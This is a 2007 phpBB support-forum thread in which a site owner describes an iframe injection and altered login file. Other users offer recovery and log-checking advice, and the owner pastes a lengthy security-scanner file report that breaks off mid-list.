Page 1 of 1

*&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 11:51 am
Author: Leadfoot
Your phpBB Version: 2.0.
phpBB Type: Standard phpBB
MODs: No
Your knowledge: Beginner
Board URL: [url]http://[/url]

PHP Version:
MySQL Version:


What was done before the problem appeared?



What was done to try to solve the problem?




De.scription and Message

Well woke up to find my site hacked this morning. Not even sure were to start. An iframe has been installed on the portal page and it also tries to install an active x control. Any ideas guys??

PostPosted: Sat Mar 31, 2007 12:15 pm
Author: Leadfoot
Well host has removed the iframe that was put on portal page. Have a lot of files that have been accesed. It was pointing at a site http:stelaartois.ru (ileft the // out so no one goes there by accident}

Problem is I now cant log into my forums as the login.php has been changed. So were might I start the repair or should I start the forums from scratch.

update. Host is still working on it I seem to be able to log in now

PostPosted: Sat Mar 31, 2007 12:23 pm
Author: ZacFields
it doesn't look like they have done anything to your database. I would start with uploading the stock 141 files as long as you don't have any major modifications.

if you do have modifications, I would try loading up stuff like login.php that you say has changed and go from there.

Zac

PostPosted: Sat Mar 31, 2007 12:25 pm
Author: ZacFields
Once you can get into the admin panel, I would see what you can do to find out how they got in.

I had this exact same hack done to my forums earlier this week but they were not able to do anything with it. But they were running requests on my forum trying to point it to a different website (usually based in europe)

When I did some research on the exploit I came up with this semi-useful link that will help you to understand what they were doing.

http://lwn.net/Articles/203904/

Zac

PostPosted: Sat Mar 31, 2007 2:00 pm
Author: shaythong
What if it happens to my site, or anyones site, I'm in the USA, you said it based in Europe (or the i-frame the hackers put in might be Europe site).

but doesn't phpbbSecurity stop this? (It lets in more exploits I heard, but integramod modified for more security including ctracker <img> )

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 2:06 pm
Author: Helter
if someone wants to hack you, and they are smart enough, they will. Integramod is by far more secure than phpbb and on par with most purchased CMS systems. The problem is php and asp. Most all CMS/forum systems are written using one or the other. Since php is the most popular, there are more uncovered exploits. As always and with any online content, you should always save current backups locally and keep your software up to date.

PostPosted: Sat Mar 31, 2007 4:51 pm
Author: Leadfoot
I have been looking through my phpbb files and man there are changes all over. I really wonder how deep they got in and if any db info was taken. I had backups of my database but not of my files. But considering some of the issues I have been having since I upgraded I may start a fresh forum. Not sure yet but maybe. I am wondering if they got in through ftp or through the forums. I read the link above zac and most of that is way over my head.

You mentioned once i got in the admin panel I could see how they got in. What would I be looking for.

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 5:16 pm
Author: shaythong
Look at the panel:

.::security::..

something like it and look through logs and your settings.

Then go to in your ACP, "Ctracker" or something like it, Log manager click that.

And check out if you got anything that looks suspicious of the hacker, not any false errors. <img>

Re: *&^#@#*& HACKED &^#&^&

PostPosted: Sat Mar 31, 2007 5:25 pm
Author: Leadfoot
Ya did both of those things right off. Could not find any logs in the security fields and nothing suspicious in the ctracker logs. I did run a file check though and it doesnt look good. Seems like a hell of a lot of errors. Am I wrong??

Code: Select all
 System Output Filepath State search.php Code in the file is possibly executable from beyond phpBB ctracker/admin/acp_footer.php SAFE ctracker/admin/acp_header.php SAFE ctracker/admin/acp_module_changedfiles.php SAFE ctracker/admin/acp_module_credits.php SAFE ctracker/admin/acp_module_filescanner.php SAFE ctracker/admin/acp_module_footer.php SAFE ctracker/admin/acp_module_globalmessage.php SAFE ctracker/admin/acp_module_ipblocker.php SAFE ctracker/admin/acp_module_logmanager.php SAFE ctracker/admin/acp_module_maintenance.php SAFE ctracker/admin/acp_module_miserableuser.php SAFE ctracker/admin/acp_module_settings.php SAFE ctracker/admin/acp_module_systemrestore.php SAFE ctracker/classes/class_ct_adminfunctions.php SAFE ctracker/classes/class_ct_database.php SAFE ctracker/classes/class_ct_userfunctions.php SAFE ctracker/classes/class_log_manager.php SAFE ctracker/engines/ct_security.php SAFE ctracker/engines/ct_footer.php SAFE ctracker/engines/ct_ipblocker.php SAFE ctracker/engines/ct_varsetter.php SAFE ctracker/engines/ct_visual_confirm.php SAFE ctracker/constants.php SAFE ctracker/emergency.php SAFE activity.php common.php / pagestart.php not included or included too late acronyms.php common.php / pagestart.php not included or included too late activity_popup.php common.php / pagestart.php not included or included too late card.php SAFE admin/admin_album_clearcache.php SAFE admin/erc.php common.php / pagestart.php not included or included too late admin/admin_acronyms.php Code in the file is possibly executable from beyond phpBB admin/admin_activity.php common.php / pagestart.php not included or included too late admin/admin_album_auth.php SAFE admin/admin_auto_lang.php Code in the file is possibly executable from beyond phpBB admin/admin_blocks.php Code in the file is possibly executable from beyond phpBB admin/admin_album_cat.php Code in the file is possibly executable from beyond phpBB admin/admin_pcp_wizard.php Code in the file is possibly executable from beyond phpBB admin/admin_album_personal.php SAFE admin/admin_approve.php Code in the file is possibly executable from beyond phpBB admin/admin_banner.php Code in the file is possibly executable from beyond phpBB admin/admin_attachments.php Code in the file is possibly executable from beyond phpBB admin/admin_donate_currency.php SAFE admin/modules/admin_blocks_pos.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_bots.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_acronyms.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_album_auth.php An undefined case occurred during scanning admin/modules/admin_album_cat.php An undefined case occurred during scanning admin/modules/admin_album_clearcache.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_activity.php common.php / pagestart.php not included or included too late admin/modules/admin_album_personal.php An undefined case occurred during scanning admin/modules/admin_approve.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_attachments.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_attach_cp.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_auto_lang.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_banner.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_blocks.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_blocks_var.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_db_maintenance.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_xs.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_board.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_clean.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_cron.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_board_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_clear_cache.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_donate_currency.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_album_cat.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_banner.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_acronyms.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_activity.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_album_personal.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_xs.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_album_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_album_clearcache.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_album_clown_SP.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_approve.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_blocks.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_attach_cp.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_board.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_blocks_pos.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_bots.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_attachments.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_auto_lang.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_links_cat.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_list.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_blocks_var.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_board_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_clean.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_clear_cache.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_cron.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_db_maintenance.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_disallow.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_db_utilities.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_donate_currency.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_donors.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_edit_module.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_email_users.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_extensions.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_faq_editor.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_force_read.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forumauth.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forums.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forums_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forum_rules.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forum_tour.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_forum_prune.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_groups.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_group_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_hacks_list.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_icons.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_im_network.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_im_log.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_im_users.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_ban.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_bulk_add.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_category.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_char.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_in_un.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_mass.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_disable.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_scores_edit.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ip_search.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ina_xtras.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_jr_admin.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_kb_art.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_kb_cat.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_kb_types.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_layout.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_mass_email.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_news.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_links.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_rating.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_referers.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_lwacctrecords.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_meta_tags.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_mod_package.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_news_cats.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_catauth.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_category.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_custom.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_file.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_fchecker.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_license.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_settings.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pa_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_classesfields.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_tableslinked.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_userfields.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_usermaps.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_wizard.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_phpbbmyadmin.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_phpinfo.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_pcp_valueslist.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_points.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_priv_msgs.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_portal.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_prune_users.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_qbar.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_sub_settings.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ranks.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_rebuild_search.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_security.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_smilies.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_smilies_upload.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_spellcheck.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_statistics.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_stats_lang.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_styles_select.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_styles.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_users.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_subtemplates.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_topic_shadow.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_userlist.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_users_inactive.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_user_ban.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_user_exptime.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_words.php Code in the file is possibly executable from beyond phpBB admin/modules/_vti_cnf/admin_wpm.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_db_utilities.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_edit_module.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_disallow.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_extensions.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forums.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_log.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_donors.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_force_read.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_groups.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_email_users.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_im_log.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_faq_editor.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forumauth.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forums_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forum_prune.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forum_rules.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_forum_tour.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_group_extend.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_hacks_list.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_im_network.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_kb_art.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_icons.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_ina_mass.php SAFE admin/modules/admin_kb_cat.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_im_users.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_ina_ban.php SAFE admin/modules/admin_ina_bulk_add.php SAFE admin/modules/admin_ina_category.php SAFE admin/modules/admin_ina_char.php SAFE admin/modules/admin_ina_disable.php SAFE admin/modules/admin_pa_category.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_ina_in_un.php SAFE admin/modules/admin_ina_scores_edit.php SAFE admin/modules/admin_ina_xtras.php SAFE admin/modules/admin_ip_search.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_jr_admin.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_kb_types.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_layout.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_links.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_links_cat.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_list.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_lwacctrecords.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_mass_email.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_mod_package.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_news.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_meta_tags.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_news_cats.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_valueslist.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_catauth.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_custom.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_fchecker.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_file.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_license.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_classesfields.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pa_settings.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_tableslinked.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_userfields.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_usermaps.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_portal.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_priv_msgs.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_pcp_wizard.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_phpbbmyadmin.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_phpinfo.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_prune_users.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_points.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_security.php An undefined case occurred during scanning admin/modules/admin_styles.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_qbar.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_ranks.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_rebuild_search.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_rating.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_smilies_upload.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_referers.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_statistics.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_users.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_smilies.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_stats_lang.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_words.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_spellcheck.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_styles_select.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_sub_settings.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_ug_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_userlist.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_subtemplates.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_topic_shadow.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_users_inactive.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_user_ban.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_user_exptime.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_wpm.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_album_config_extended.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_cash.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_cracker_tracker.php SAFE admin/modules/admin_kb_auth.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_kb_custom.php Code in the file is possibly executable from beyond phpBB admin/modules/admin_kb_rebuild_search.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_currencies.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_events.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_exchange.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_forums.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_groups.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_help.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_reset.php Code in the file is possibly executable from beyond phpBB admin/modules/cash_settings.php Code in the file is possibly executable from beyond phpBB admin/admin_attach_cp.php common.php / pagestart.php not included or included too late admin/admin_blocks_pos.php SAFE admin/admin_blocks_var.php SAFE admin/admin_board.php Code in the file is possibly executable from beyond phpBB admin/admin_board_extend.php SAFE admin/admin_bots.php SAFE admin/admin_clean.php SAFE admin/admin_clear_cache.php SAFE admin/admin_cron.php SAFE admin/admin_db_maintenance.php Code in the file is possibly executable from beyond phpBB admin/admin_xs.php Code in the file is possibly executable from beyond phpBB admin/admin_db_utilities.php SAFE admin/admin_edit_module.php common.php / pagestart.php not included or included too late admin/index.php SAFE admin/admin_disallow.php SAFE admin/admin_group_extend.php SAFE admin/vcache.php An undefined case occurred during scanning admin/admin_donors.php SAFE admin/admin_extensions.php common.php / pagestart.php not included or included too late admin/admin_email_users.php Code in the file is possibly executable from beyond phpBB admin/admin_faq_editor.php Code in the file is possibly executable from beyond phpBB admin/admin_force_read.php common.php / pagestart.php not included or included too late admin/admin_forumauth.php SAFE admin/admin_forums.php SAFE admin/admin_forums_extend.php Code in the file is possibly executable from beyond phpBB admin/admin_forum_prune.php SAFE admin/admin_forum_rules.php Code in the file is possibly executable from beyond phpBB admin/admin_forum_tour.php Code in the file is possibly executable from beyond phpBB admin/admin_icons.php SAFE admin/admin_groups.php Code in the file is possibly executable from beyond phpBB admin/admin_im_network.php Code in the file is possibly executable from beyond phpBB admin/admin_kb_art.php Code in the file is possibly executable from beyond phpBB admin/admin_hacks_list.php Code in the file is possibly executable from beyond phpBB admin/admin_ina_category.php SAFE admin/xs_cache.php SAFE admin/admin_im_log.php Code in the file is possibly executable from beyond phpBB admin/admin_im_users.php Code in the file is possibly executable from beyond phpBB admin/admin_ina_bulk_add.php SAFE admin/admin_layout.php SAFE admin/admin_ina_ban.php SAFE admin/admin_ina_char.php SAFE admin/admin_ina_in_un.php SAFE admin/admin_ina_disable.php SAFE admin/admin_ina_mass.php SAFE admin/admin_ina_scores_edit.php SAFE admin/admin_ina_xtras.php SAFE admin/admin_ip_search.php SAFE admin/xs_clone.php SAFE admin/admin_jr_admin.php Code in the file is possibly executable from beyond phpBB admin/admin_kb_cat.php Code in the file is possibly executable from beyond phpBB admin/admin_links.php Code in the file is possibly executable from beyond phpBB admin/admin_links_cat.php Code in the file is possibly executable from beyond phpBB admin/admin_kb_types.php Code in the file is possibly executable from beyond phpBB admin/admin_lwacctrecords.php SAFE admin/admin_meta_tags.php SAFE admin/admin_mod_package.php common.php / pagestart.php not included or included too late admin/admin_list.php SAFE admin/admin_news.php SAFE admin/admin_news_cats.php SAFE admin/admin_mass_email.php SAFE admin/admin_pa_catauth.php SAFE admin/admin_pa_custom.php Code in the file is possibly executable from beyond phpBB admin/admin_pa_file.php Code in the file is possibly executable from beyond phpBB admin/admin_pa_license.php Code in the file is possibly executable from beyond phpBB admin/xs_chmod.php SAFE admin/admin_pa_category.php Code in the file is possibly executable from beyond phpBB admin/admin_ranks.php SAFE admin/admin_rating.php Code in the file is possibly executable from beyond phpBB admin/admin_pa_fchecker.php Code in the file is possibly executable from beyond phpBB admin/admin_pa_settings.php Code in the file is possibly executable from beyond phpBB admin/admin_pa_ug_auth.php SAFE admin/admin_pcp_classesfields.php SAFE admin/admin_pcp_tableslinked.php SAFE admin/admin_pcp_userfields.php SAFE admin/admin_pcp_usermaps.php SAFE admin/admin_pcp_valueslist.php SAFE admin/admin_wpm.php Code in the file is possibly executable from beyond phpBB admin/admin_phpbbmyadmin.php SAFE admin/admin_phpinfo.php Code in the file is possibly executable from beyond phpBB admin/admin_points.php common.php / pagestart.php not included or included too late admin/admin_portal.php SAFE admin/admin_priv_msgs.php Code in the file is possibly executable from beyond phpBB admin/admin_prune_users.php common.php / pagestart.php not included or included too late admin/admin_rebuild_search.php SAFE admin/xs_edit.php SAFE admin/admin_qbar.php Code in the file is possibly executable from beyond phpBB admin/admin_security.php Code in the file is possibly executable from beyond phpBB admin/admin_stats_lang.php Code in the file is possibly executable from beyond phpBB admin/xs_index.php SAFE admin/_vti_cnf/admin_album_clearcache.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/erc.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_acronyms.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_activity.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_album_auth.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_xs.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_album_cat.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/index.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_album_clown_SP.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forumauth.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forums.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_album_personal.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_attachments.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_attach_cp.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_approve.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_auto_lang.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_blocks.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_blocks_pos.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_banner.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_blocks_var.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_board.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_board_extend.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_bots.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_clean.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_clear_cache.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_cron.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_db_maintenance.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_db_utilities.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_disallow.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_donate_currency.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_donors.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_edit_module.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_email_users.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_faq_editor.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_extensions.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_ina_scores_edit.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_force_read.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forum_prune.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/vcache.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forums_extend.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forum_rules.php Code in the file is possibly executable from beyond phpBB admin/_vti_cnf/admin_forum_tour.php Code in the 